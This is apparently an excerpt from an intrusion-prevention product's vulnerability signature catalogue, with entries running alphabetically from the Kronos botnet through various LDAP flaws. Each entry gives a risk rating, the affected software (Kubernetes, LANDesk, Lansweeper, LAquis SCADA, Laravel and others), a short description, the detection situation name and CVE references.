Description: Kronos is a malicious botnet which poses a serious threat to Internet users. Most notably, Kronos engages in trojan activity as an information stealer and web proxy. In addition, it may download further malicious modules. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately.
Situation: File-Binary_Kronos-Botnet-Traffic
Back to top

Ksmbd-Tools-Ksmbd.Mountd-Ndr_write_bytes-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in ksmdb-tools
Risk: Moderate
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Platform: Generic
Software: Canonical ksmdb-tools
Type: Buffer Overflow
Description: Insufficient validation of the RPC WKSSVC requests submitted to ksmbd.mountd daemon causes a heap buffer overflow, which can be exploited to run code as root on the target system.
Situation: MSRPC-TCP_CPS-Ksmbd-Tools-Ksmbd.Mountd-Ndr_write_bytes-Heap-Buffer-Overflow
Back to top

Kubernetes-API-Proxy-Request-Handling-Privilege-Escalation

About this vulnerability: A vulnerability in Kubernetes Kubernetes
Risk: Moderate
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Kubernetes
Type: Malfunction
Description: Insufficient handling of error conditions from backend servers causes a privilege escalation vulnerability in Kubernetes. A successful exploit allows an attacker to gain full administrative privileges on the cluster.
Situation: HTTP_CS-Kubernetes-API-Proxy-Request-Handling-Privilege-Escalation
References:
CVE-2018-1002105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1002105
Back to top

Kubernetes-Authenticated-Code-Execution

About this vulnerability: A vulnerability in Kubernetes.
Risk: High
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Platform: Linux; Unix
Software: Kubernetes
Type: Misconfiguration
Description: A vulnerability in Kubernetes which allows for unauthenticated remote code execution.
Situation: HTTP_CSU-Kubernetes-Authenticated-Code-Execution
Back to top

Kubernetes-Dashboard-Authentication-Bypass-Information-Disclosure

About this vulnerability: A vulnerability in Kubernetes Dashboard
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Kubernetes
Type: Malfunction
Description: An information disclosure vulnerability has been reported in Kubernetes Dashboard. The vulnerability is due to a design weakness that allows a user to view a secret object. A remote attacker can exploit this vulnerability by sending a crafted request to a vulnerable Kubernetes Dashboard server. Successful exploitation could result in the attackers gaining access to Kubernetes cluster secrets and other sensitive information.
Situation: HTTP_CSU-Kubernetes-Dashboard-Authentication-Bypass-Information-Disclosure
References:
CVE-2018-18264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18264
Back to top

LabStore-SQL-Injection

About this vulnerability: A vulnerability in LabStore
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LabStore
Type: SQL Injection
Description: There is an SQL injection vulnerability in all LabStore versions until 1.5.4.
Situation: HTTP_CRL-LabStore-SQL-Injection
References:
BID-50551
http://www.securityfocus.com/bid/50551
Back to top

Labview-Web-Server-Denial-Of-Service

About this vulnerability: A vulnerability in Labview Web Server
Risk: High
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows;Linux
Software: Labview Server
Type: Malfunction
Description: A vulnerability exists in Labview Web Server. An attacker could send a custom HTTP request causing a denial of service condition, crashing Labview.
Situation: HTTP_CS-Labview-Web-Server-Denial-Of-Service
Back to top

LANDesk-Management-Suite-Amtversion-Cross-Site-Scripting

About this vulnerability: A vulnerability in LANDesk Management Suite
Risk: Moderate
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LANDesk Management Suite
Type: Input Validation
Description: A cross-site scripting vulnerability exists in LANDesk Management Suite. The vulnerability is due to improper validation of a user-supplied parameter AMTVersion. A remote attacker could exploit this vulnerability by enticing a target user to view crafted web content. A successful attack may result in the execution of script code in the target user's browser.
Situation: HTTP_CRL-LANDesk-Management-Suite-Amtversion-Cross-Site-Scripting
References:
CVE-2014-5360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5360
BID-72450
http://www.securityfocus.com/bid/72450
OSVDB-117878
http://www.osvdb.org/117878
Back to top

LANDesk-Management-Suite-Frm_splitfrm-Remote-File-Inclusion

About this vulnerability: A vulnerability in LANDesk Management Suite
Risk: Moderate
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LANDesk Management Suite
Type: Input Validation
Description: A remote file inclusion vulnerability has been reported in LANDesk Management Suite. The vulnerability is due to insufficient input validation in /remote/frm_splitfrm.aspx. A remote attacker could exploit the remote file inclusion vulnerability by enticing a user to click on a link with a maliciously crafted top parameter. Successful exploitation could lead to arbitrary script code execution in the browser of the target user.
Situation: HTTP_CRL-LANDesk-Management-Suite-Frm_splitfrm-Remote-File-Inclusion
References:
CVE-2014-5362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5362
Back to top

LANDesk-Management-Suite-Qip-Service-Heal-Packet-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in LANDesk Management Suite
Risk: High
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: LANDesk Management Suite
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in LANDesk QIP service. The vulnerability is due to insufficient validation when processing specially crafted heal requests. A remote unauthenticated attacker can leverage this vulnerability to inject and execute arbitrary code on the target host with System level privileges.
Situation: Generic_CS-LANDesk-Management-Suite-Qip-Service-Heal-Packet-Buffer-Overflow
References:
CVE-2008-2468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2468
BID-31193
http://www.securityfocus.com/bid/31193
Back to top

LANDesk-Management-Suite-Remote-File-Inclusion

About this vulnerability: A vulnerability in LANDesk Management Suite
Risk: High
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LANDesk Management Suite
Type: Input Validation
Description: A remote file inclusion vulnerability has been reported in LANDesk Management Suite. The vulnerability is due to insufficient input validation in /remote/frm_coremainfrm.aspx and /ldms/sm_actionfrm.asp. A remote unauthenticated attacker could exploit the remote file inclusion vulnerability by enticing a user to click on a link with a maliciously crafted d parameter. Successful exploitation could lead to arbitrary code execution under the security context of the browser.
Situation: HTTP_CRL-LANDesk-Management-Suite-Remote-File-Inclusion
References:
CVE-2014-5362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5362
Back to top

LANDesk-ThinkManagement-Suite-ServerSetup.asmx-Directory-Traversal

About this vulnerability: A vulnerability in LANDesk Lenovo ThinkManagement Suite
Risk: Moderate
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LANDesk Lenovo ThinkManagement Suite
Type: Directory Traversal
Description: There is a directory traversal vulnerability in LANDesk ThinkManagement Suite. The vulnerability is due to insufficient validation of user input while processing requests sent to ServerSetup.asmx. By specifying a RunAMTCommand operation, remote, unauthenticated attackers are able to create arbitrary files on the server and execute arbitrary code from the uploaded file.
Situation: HTTP_CS-LANDesk-ThinkManagement-Suite-ServerSetup.asmx-Directory-Traversal
References:
CVE-2012-1195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1195
BID-52023
http://www.securityfocus.com/bid/52023
OSVDB-79276
http://www.osvdb.org/79276
Back to top

LANDesk-ThinkManagement-Suite-SetTaskLogByFile-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in LANDesk Lenovo ThinkManagement Suite
Risk: Moderate
First detected in: sgpkg-ips-449-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LANDesk Lenovo ThinkManagement Suite
Type: Directory Traversal
Description: There is a directory traversal vulnerability in LANDesk ThinkManagement Suite. The vulnerability is due to insufficient validation of user input while processing requests sent to "VulCore.asmx". By specifying the 'SetTaskLogByFile' operation, remote unauthenticated attackers will be able to delete arbitrary files on the server. The vendor, LANDesk, has not released any advisory regarding this vulnerability.
Situation: HTTP_CS-LANDesk-ThinkManagement-Suite-SetTaskLogByFile-Arbitrary-File-Deletion
References:
CVE-2012-1196
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1196
BID-52023
http://www.securityfocus.com/bid/52023
OSVDB-79277
http://www.osvdb.org/79277
Back to top

Langflow-AI-RCE-CVE-2025-3248

About this vulnerability: A vulnerability in Langflow AI
Risk: High
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Platform: Generic
Software: Langflow AI
Type: Input Validation
Description: An vulnerability in Langflow AI, versions before 1.3.0, which allows remote attackers to execute arbitrary Python code with the use of decorators and default arguments via the /api/v1/validate/code endpoint.
Situation: HTTP_CRL-Langflow-AI-RCE-CVE-2025-3248
References:
CVE-2025-3248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-3248
Back to top

Lansweeper-Assetactions-Directory-Traversal

About this vulnerability: A vulnerability in Lansweeper lansweeper
Risk: Moderate
First detected in: sgpkg-ips-1546-5242
Last changed: sgpkg-ips-1546-5242
Platform: Generic
Software: Lansweeper
Type: Directory Traversal
Description: Insufficient sanitation of the txtdocname parameter when uploading files causes directory traversal vulnerability in Lansweeper. A successful exploitation allows an attacker to overwrite arbitrary files on the target system.
Situation: HTTP_CS-Lansweeper-Assetactions-Directory-Traversal
References:
CVE-2022-32573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32573
Back to top

Lansweeper-Assetactions-SQL-Injection

About this vulnerability: A vulnerability in Lansweeper
Risk: Moderate
First detected in: sgpkg-ips-1459-5242
Last changed: sgpkg-ips-1459-5242
Platform: Generic
Software: Lansweeper
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Lansweeper. The vulnerability is due to insufficient input validation. A remote, authenticated attacker can exploit these vulnerabilities by sending a crafted request to the target system. Successful exploitation results in SQL command execution under the security context of the database process.
Situation: HTTP_CRL-Lansweeper-Assetactions-SQL-Injection
References:
CVE-2022-21210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21210
Back to top

Lansweeper-Getassetsbygroupid-SQL-Injection

About this vulnerability: A vulnerability in Lansweeper lansweeper
Risk: Moderate
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1445-5242
Platform: Generic
Software: Lansweeper
Type: Input Validation
Description: Insufficient input validation when handling incoming requests causes an SQL injection vulnerability in Lansweeper. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Lansweeper-Getassetsbygroupid-SQL-Injection
References:
CVE-2022-21234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21234
Back to top

Lansweeper-Helpdeskactions.aspx-Edittemplate-Directory-Traversal

About this vulnerability: A vulnerability in Lansweeper
Risk: Moderate
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1554-5242
Platform: Generic
Software: Lansweeper
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Lansweeper. The vulnerability is due to insufficient sanitation of inline attachment names when editing templates. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target system. Successful exploitation results in arbitrary file writes on the target system.
Situation: HTTP_CRL-Lansweeper-Helpdeskactions.aspx-Edittemplate-Directory-Traversal
References:
CVE-2022-29517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29517
Back to top

Lansweeper-Helpdesksetupactions-SQL-Injection

About this vulnerability: A vulnerability in Lansweeper
Risk: Moderate
First detected in: sgpkg-ips-1457-5242
Last changed: sgpkg-ips-1457-5242
Platform: Generic
Software: Lansweeper
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Lansweeper. The vulnerability is due to insufficient input validation. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation can result in remote code execution under the database service.
Situation: HTTP_CRL-Lansweeper-Helpdesksetupactions-SQL-Injection
References:
CVE-2022-22149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22149
Back to top

Lansweeper-Tickettemplateactions.aspx-Directory-Traversal

About this vulnerability: A vulnerability in Lansweeper
Risk: Moderate
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1546-5242
Platform: Generic
Software: Lansweeper
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Lansweeper. The vulnerability is due to insufficient sanitation of the fileuid parameter when retrieving ticket template files. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target system. Successful exploitation results in arbitrary file reads on the target system.
Situation: HTTP_CSU-Lansweeper-Tickettemplateactions.aspx-Directory-Traversal
References:
CVE-2022-27498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27498
Back to top

Lansweeper-Webuseractions-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Lansweeper lansweeper
Risk: Moderate
First detected in: sgpkg-ips-1451-5242
Last changed: sgpkg-ips-1451-5242
Platform: Generic
Software: Lansweeper
Type: Input Validation
Description: Insufficient sanitization of the loginmessage and loginfootertext parameters in user-sent requests causes a cross-site scripting vulnerability in Lansweeper. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Lansweeper-Webuseractions-Stored-Cross-Site-Scripting
References:
CVE-2022-21145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21145
Back to top

Lantronix-Premierwave-Command-Injection-CVE-2021-21881

About this vulnerability: A vulnerability in Lantronix PremierWave 2050
Risk: High
First detected in: sgpkg-ips-1501-5242
Last changed: sgpkg-ips-1501-5242
Platform: Generic
Software: Lantronix PremierWave
Type: Input Validation
Description: A command injection vulnerability has been reported in Lantronix PremierWave 2050. An authenticated attacker could use this vulnerability to execute arbitrary OS commands.
Situation: HTTP_CRL-Lantronix-Premierwave-Command-Injection-CVE-2021-21881
References:
CVE-2021-21881
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21881
Back to top

Laquis-SCADA-LGX-Report-Addcombofile-Arbitrary-File-Write

About this vulnerability: A vulnerability in LAquis SCADA
Risk: Moderate
First detected in: sgpkg-ips-1801-5242
Last changed: sgpkg-ips-1801-5242
Platform: Generic
Software: LAquis SCADA
Type: Directory Traversal
Description: Insufficient user input validation upon loading an LGX file and processing AddComboFile script function causes an arbitrary file write vulnerability in LAquis LGX. A successful exploitation allows an attacker to overwrite files on the target system and potentially execute them.
Situation: File-Binary_Laquis-SCADA-LGX-Report-Addcombofile-Arbitrary-File-Write
References:
CVE-2024-5040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5040
Back to top

Laquis-SCADA-LGX-Report-Arbitrary-File-Write

About this vulnerability: A vulnerability in LAquis SCADA
Risk: High
First detected in: sgpkg-ips-1167-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LAquis SCADA
Type: Input Validation
Description: A vulnerability in LAquis SCADA, versions prior to 4.1.0.4150, which allows remote attackers to write arbitrary files and possible execute arbitrary code by enticing a user to open a maliciously crafted LGX report.
Situation: File-Binary_Laquis-SCADA-LGX-Report-Arbitrary-File-Write
References:
CVE-2018-18988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18988
Back to top

Laquis-Scada-LGX-Report-File-Parsing-Out-of-Bounds-Write

About this vulnerability: A vulnerability in LAquis SCADA
Risk: Moderate
First detected in: sgpkg-ips-1172-5242
Last changed: sgpkg-ips-1706-5242
Platform: Generic
Software: LAquis SCADA
Type: Malfunction
Description: There has been reported an out-of-bounds write vulnerability in the LAquis SCADA. This vulnerability could be exploited by opening a maliciously crafted report file. Successful exploitation could lead in arbitrary code execution.
Situation: File-Binary_Laquis-Scada-LGX-Report-File-Parsing-Out-of-Bounds-Write
References:
CVE-2018-18986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18986
Back to top

Laquis-SCADA-LGX-Report-String-Writetofile-Arbitrary-File-Write

About this vulnerability: A vulnerability in LAquis SCADA
Risk: Moderate
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Platform: Generic
Software: LAquis SCADA
Type: Directory Traversal
Description: Insufficient user input validation while processing String Writetofile script function in an LGX file causes an arbitrary write vulnerability in LAquis SCADA. A successful exploitation allows an attacker to write data and possibly execute arbitrary code on the target system.
Situation: File-Binary_Laquis-SCADA-LGX-Report-String-Writetofile-Arbitrary-File-Write
References:
CVE-2024-5040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5040
Back to top

Laquis-Scada-LGX-Report-Table-Save-Arbitrary-File-Write

About this vulnerability: A vulnerability in LAquis SCADA
Risk: Moderate
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1784-5242
Platform: Generic
Software: LAquis SCADA
Type: Directory Traversal
Description: Insufficient user input validation upon loading an LGX file and processing Table Save script functio causes an arbitrary file write vulnerability in LAquis SCADA. A successful exploitation allows an attacker to write arbitrary files on the target system and execute code on it.
Situation: File-Binary_Laquis-Scada-LGX-Report-Table-Save-Arbitrary-File-Write
References:
CVE-2024-5040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5040
Back to top

Laquis-Scada-Web-Server-Acompanhamentotela-Tagaltere-Command-Injection

About this vulnerability: A vulnerability in LAquis SCADA
Risk: Moderate
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LAquis SCADA
Type: Input Validation
Description: Improper handling of URI parameters sent to the acompanhamentotela.lhtml page causes a command injection vulnerability in LAquis SCADA. A successful exploit allows an attacker to execute arbitrary code with the privileges of the server process.
Situation: HTTP_CSU-Laquis-Scada-Web-Server-Acompanhamentotela-Tagaltere-Command-Injection
References:
CVE-2018-18992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18992
Back to top

Laquis-Scada-Web-Server-Directory-Traversal

About this vulnerability: A vulnerability in LAquis SCADA
Risk: Moderate
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LAquis SCADA
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability in LAquis SCADA. This vulnerability could be exploited remotely and without authentication. Succesful exploitation can result in information disclosure.
Situation: HTTP_CSU-Potential-Dot-Dot-Slash-Directory-Traversal
References:
CVE-2018-18990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18990
Back to top

Laquis-Scada-Web-Server-Relatorioindividual-Tag-Code-Injection

About this vulnerability: A vulnerability in LAquis SCADA
Risk: Moderate
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LAquis SCADA
Type: Input Validation
Description: There has been reported a code injection vulnerability in LAquis SCADA. This vulnerability could be exploited by a remote attacker sending crafted request to the target server. Successful exploitation may lead in arbitrary code execution.
Situation: HTTP_CRL-Laquis-Scada-Web-Server-Relatorioindividual-Tag-Code-Injection
References:
CVE-2018-18992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18992
Back to top

Laquis-Scada-Web-Server-Relatorioindividual-Titulo-Command-Injection

About this vulnerability: A vulnerability in LAquis SCADA
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LAquis SCADA
Type: Input Validation
Description: Improper handling of specific parameters submitted in requests to the relatorioindividual.lhtml page causes a command injection vulnerability in LAquis SCADA. A successful exploit allows an attacker to run arbitrary commands with the privileges of the web server.
Situation: HTTP_CRL-Laquis-Scada-Web-Server-Relatorioindividual-Titulo-Command-Injection
References:
CVE-2018-18992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18992
Back to top

Laquis-Scada-Web-Server-Relatorionome-Nome-Command-Injection

About this vulnerability: A vulnerability in LAquis SCADA
Risk: Moderate
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LAquis SCADA
Type: Input Validation
Description: Improper handling of specific parameters submitted in requests to the relatorionome.lhtml page causes a command injection vulnerability in LAquis SCADA. A successful exploit allows an attacker to run arbitrary commands with the privileges of the web server.
Situation: HTTP_CRL-Laquis-Scada-Web-Server-Relatorionome-Nome-Command-Injection
References:
CVE-2018-18996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18996
Back to top

Laravel-Remote-Code-Execution-CVE-2018-15133

About this vulnerability: A vulnerability in Laravel
Risk: High
First detected in: sgpkg-ips-1677-5242
Last changed: sgpkg-ips-1677-5242
Platform: Generic
Software: Laravel
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Laravel Framework versions through 5.5.40 and 5.6.x through 5.6.29. This vulnerability is due to insecure unserialisation of client-provided X-XSRF-TOKEN values.
Situation: HTTP_CSH-Laravel-Framework-Unusual-X-XSRF-TOKEN-Length
References:
CVE-2018-15133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15133
Back to top

Large-Content-Length-Value

About this vulnerability: A large value in Content-Length header
Risk: Low
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Any Software
Type: Streaming Media
Description: When a web server serves a file using the Hypertext Transfer Protocol (HTTP), it specifies the length of the file in the Content-Length header. This way, the client knows how large a file it will receive. This information can be used to limit or monitor attempts to download large files.
Situation: HTTP_SHS-Large-Content-Length-Value
Back to top

Launch-Command-In-PDF

About this vulnerability: Launch command in PDF file
Risk: Low
First detected in: sgpkg-ips-299-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: <os>
Type: Code Injection
Description: The Launch command has been detected inside a PDF document. This may indicate a malicious PDF file.
Situation: HTTP_SS-Launch-Command-In-PDF
File-PDF_Launch-Command-In-PDF
Back to top

LB-Link-Command-Injection-CVE-2023-26801

About this vulnerability: A vulnerability in LB-Link wireless routers
Risk: High
First detected in: sgpkg-ips-1748-5242
Last changed: sgpkg-ips-1748-5242
Platform: Generic
Software: LB-Link
Type: Input Validation
Description: A command injection vulnerability has been reported in the firmware of the LB-Link BL-AC1900, BL-WR9000, BL-X26 and BL-LTE300 wireless routers. An unauthenticated attacker could use this vulnerability to execute arbitrary OS commands via a crafted HTTP request.
Situation: HTTP_CRL-LB-Link-Command-Injection-CVE-2023-26801
References:
CVE-2023-26801
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26801
Back to top

LCDproc-Multiple-Buffer-Overflow-Vulnerabilities

About this vulnerability: A vulnerability in LCDproc
Risk: Moderate
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Unix
Software: LCDproc
Type: Malfunction
Description: There are multiple buffer overflows in LCDProc 0.4.1, and possibly other 0.4.x versions up to 0.4.4, allows remote attackers to execute arbitrary code via (1) a long invalid command to parse_all_client_messages function, or (2) long argv command to test_func_func function.
Situation: Generic_CS-LCDproc-Test-Func-Buffer-Overflow-Vulnerability
References:
CVE-2004-1916
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1916
BID-10085
http://www.securityfocus.com/bid/10085
Back to top

LCDproc-Parse_All_Client_Messages-Buffer-Overflow

About this vulnerability: A vulnerability in LCDproc
Risk: Moderate
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Unix
Software: LCDproc
Type: Malfunction
Description: Buffer overflow in the parse_all_client_messages function in LCDproc 0.4.x up to 0.4.4 allows remote attackers to execute arbitrary code via a large number of arguments.
Situation: Generic_CS-LCDproc-Parse_All_Client_Messages-Buffer-Overflow
References:
CVE-2004-1915
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1915
BID-10085
http://www.securityfocus.com/bid/10085
Back to top

LCDproc-Test_Func-Format-String-Vulnerability

About this vulnerability: A vulnerability in LCDproc
Risk: Moderate
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Unix
Software: LCDproc
Type: Malfunction
Description: There is a format string vulnerability in test_func_func in LCDProc 0.4.1 and earlier allows remote attackers to execute arbitrary code via format string specifiers in the str variable.
Situation: Generic_CS-LCDproc-Test_Func-Format-String-Vulnerability
References:
CVE-2004-1917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1917
BID-10085
http://www.securityfocus.com/bid/10085
Back to top

LDAP-IBM-Lotus-Domino-LDAP-Server-Invalid-DN-Message-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in IBM Lotus Domino LDAP service
Risk: High
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 Server; Windows 2000 Advanced Server; Windows 2003; Windows 2003 64-bit
Software: Lotus Domino
Type: Buffer Overflow
Description: IBM Lotus Domino LDAP service has a buffer overflow vulnerability. By sending a crafted LDAP Add request that contains an excessively long DN string, a remote unauthenticated attacker can cause a DoS or compromise the vulnerable system.
Situation: LDAP_IBM-Lotus-Domino-LDAP-Server-Invalid-DN-Message-Buffer-Overflow
References:
CVE-2007-1739
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1739
BID-23174
http://www.securityfocus.com/bid/23174
OSVDB-34092
http://www.osvdb.org/34092
Back to top

LDAP-IBM-Tivoli-Directory-Server-LDAP-Buffer-Overflow

About this vulnerability: Detects Buffer Overflow Exploits Against IBM Tivoli Directory Server
Risk: Moderate
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Directory Server
Type: Buffer Overflow
Description: The IBM Tivoli Directory Server product has a buffer overflow vulnerability. The product fails to correctly process the length field of the OCTET STRING object, which leads to an integer overflow with crafted length values. This vulnerability can be used to cause a denial of service and possibly to execute arbitrary code in the context of the vulnerable process.
Situation: LDAP_IBM-Tivoli-Directory-Server-LDAP-Buffer-Overflow
References:
CVE-2006-0717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0717
BID-16593
http://www.securityfocus.com/bid/16593
OSVDB-23089
http://www.osvdb.org/23089
Back to top

LDAP-LSASS-Heap-Overflow-CVE-2010-0820

About this vulnerability: LDAP LSASS Heap Overflow vulnerability
Risk: Moderate
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Windows LSASS heap overflow vulnerability in LDAP handling, MS10-068.
Situation: LDAP_CS-LSASS-Heap-Overflow-CVE-2010-0820
References:
CVE-2010-0820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0820
MS10-068
http://technet.microsoft.com/security/bulletin/MS10-068
Back to top

LDAP-Microsoft-Active-Directory-LDAP-Search-Request-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Microsoft Active Directory on Windows 2000 Server platform
Risk: High
First detected in: sgpkg-ips-179-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Active Directory on Windows 2000 Server platform. A remote unauthenticated attacker can send a malicious LDAP SearchRequest which contains a crafted baseObject field to a vulnerable server to cause a denial of service, causing the entire system to shut down or execute arbitrary code with the privileges of the affected process, the System account.
Situation: Generic_CS-Microsoft-Active-Directory-LDAP-Search-Request-Buffer-Overflow
LDAP_Microsoft-Active-Directory-LDAP-Search-Request-Buffer-Overflow
References:
CVE-2008-4023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4023
BID-31609
http://www.securityfocus.com/bid/31609
OSVDB-49058
http://www.osvdb.org/49058
MS08-060
http://technet.microsoft.com/security/bulletin/MS08-060
Back to top

LDAP-Novell-eDirectory-evtFilteredMonitorEventsRequest-Function-Heap-Overflow

About this vulnerability: Heap buffer overflow vulnerability in Novell eDirectory
Risk: High
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell eDirectory
Type: Buffer Overflow
Description: Novell eDirectory has a heap buffer overflow vulnerability. The vulnerability allows a remote attacker to cause a DoS or compromise the system running the vulnerable service process.
Situation: LDAP_Novell-eDirectory-evtFilteredMonitorEventsRequest-Function-Heap-Overflow
References:
CVE-2006-4509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4509
BID-20663
http://www.securityfocus.com/bid/20663
Back to top

LDAP-Novell-eDirectory-evtFilteredMonitorEventsRequest-Invalid-Free

About this vulnerability: Memory handling vulnerability in Novell eDirectory
Risk: Moderate
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell eDirectory
Type: Malfunction
Description: Novell eDirectory suffers from a vulnerability in memory handling when parsing certain LDAP messages. Remote attackers can exploit the vulnerability by sending crafted LDAP messages to a vulnerable server. A successful exploit allows arbitrary code execution.
Situation: LDAP_Novell-eDirectory-evtFilteredMonitorEventsRequest-Invalid-Free
References:
CVE-2006-4510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4510
BID-20663
http://www.securityfocus.com/bid/20663
Back to top

LDAP-OpenLDAP-ber-get-next-BER-Decoding-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in OpenLDAP
Risk: Moderate
First detected in: sgpkg-ips-158-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenLDAP
Type: Malfunction
Description: OpenLDAP suffers from a design error when decoding ASN.1 BER-encoded network messages. A remote unauthenticated attacker can exploit the vulnerability to cause a denial of service terminating the slapd process.
Situation: LDAP_OpenLDAP-ber-get-next-BER-Decoding-Denial-Of-Service
References:
CVE-2008-2952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2952
BID-30013
http://www.securityfocus.com/bid/30013
OSVDB-46689
http://www.osvdb.org/46689
Back to top

LDAP-OpenLDAP-LDAP-Server-BIND-Request-Denial-Of-Service

